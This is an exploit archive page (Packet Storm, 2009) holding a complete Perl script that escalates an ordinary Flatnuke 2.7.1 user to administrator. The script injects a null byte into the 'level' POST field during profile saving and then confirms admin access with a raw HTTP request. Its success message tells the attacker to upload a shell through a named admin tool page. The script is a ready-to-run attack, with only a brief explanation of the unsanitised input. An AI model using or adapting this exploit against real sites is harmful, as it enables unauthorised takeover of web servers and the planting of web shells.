what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Flatnuke 2.7.1 Privilege Escalation

Flatnuke 2.7.1 Privilege Escalation
Posted Apr 14, 2009
Authored by StAkeR

Flatnuke versions 2.7.1 and below remote privilege escalation exploit.

tags | exploit, remote
SHA-256 | 025b7a24ea1ac2271d3a83105f57aa45cbeb5b3319ab4f5ae88ed9514951b356

Flatnuke 2.7.1 Privilege Escalation

Change Mirror Download
#!/usr/bin/env perl
#
# Flatnuke <= 2.7.1 (level) Privilege Escalation 0-day Exploit
#
# Description
# -----------
# Flatnuke contains one flaw that may allow a user to become administrator.
# The issue is due to 'sections/none_Login/section.php' script not properly
# sanitizing user input supplied to the "level" POST variable. GPC = Off
# Change your rights using the null byte. Dork? Find it yourself.
# -----------
# by Juri Gianni aka yeat - staker[at]hotmail[dot]it
# thanks to #zeroidentity chan - http://zeroidentity.org
# Aquilo,mrdotkom,p3ri0d and the other members
#
# http://www.youtube.com/watch?v=fCRkJb8H2mQ italian
# http://www.youtube.com/watch?v=1U4KKuqdoRg english
#
# Usage/Example
# -------------
# perl flatnuke.pl host /path username secid
# perl flatnuke.pl localhost /flatnuke yeat 1ab8c9b8d33a4a4e1001d07af5565d22
# -------------

use LWP::UserAgent;
use IO::Socket;


our ($host,$path,$user,$secid) = @ARGV;

if (@ARGV != 4) {
print "Flatnuke <= 2.7.1 (level) Privilege Escalation 0-day Exploit\n";
Usage::Exploit();
}
else {
Flatnuke::Exploit();
}


sub Flatnuke::Exploit()
{
my ($ret,$lwp);

$lwp = new LWP::UserAgent;

$lwp->timeout(5);
$lwp->agent('Links (2.1pre26; Linux 2.6.19-gentoo-r5 x86_64; x)');
$lwp->default_header('Cookie' => "myforum=$user; path=$path; secid=$secid; path=$path;");

$ret = $lwp->post("http://$host/$path/index.php?mod=none_Login",
[
action => 'saveprofile',
user => $user,
hiddenmail => 'on',
ava => 'blank.png',
level => "\x0010",
]);

if ($ret->is_success) {
Flatnuke::Rights();
}
}


sub Flatnuke::Rights()
{
my $packet;
my $result;
my $socket = new IO::Socket::INET(
PeerAddr => $host,
PeerPort => 80,
Proto => 'tcp',
) or die $!;

$packet .= "GET /$path/index.php?mod=none_Admin HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "User-Agent: Lynx (textmode)\r\n";
$packet .= "Referer: http://$host/$path/index.php?mod=none_Admin\r\n";
$packet .= "Cookie: myforum=$user; path=$path; secid=$secid; path=$path;\r\n";
$packet .= "Connection: close\r\n\r\n";

$socket->send($packet);

while (<$socket>) {
$result .= $_;
}

if ($result =~ /(livello|nivel|level|niveau) 10/i) {
print "Exploit successful..you're admin\n";
print "Upload a shell on: sections/none_Admin/none_tools/webadmin.php\n";
}
else {
print "Exploit unsuccesful..\n";
}
}


sub Usage::Exploit()
{
print "Usage: perl $0 host/path username secid\n";
print "RunEx: perl localhost /flatnuke yeat c3e557f271a86f893e02971b38b51653\n";
print "by staker[at]hotmail[dot]it\n";
exit;
}


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close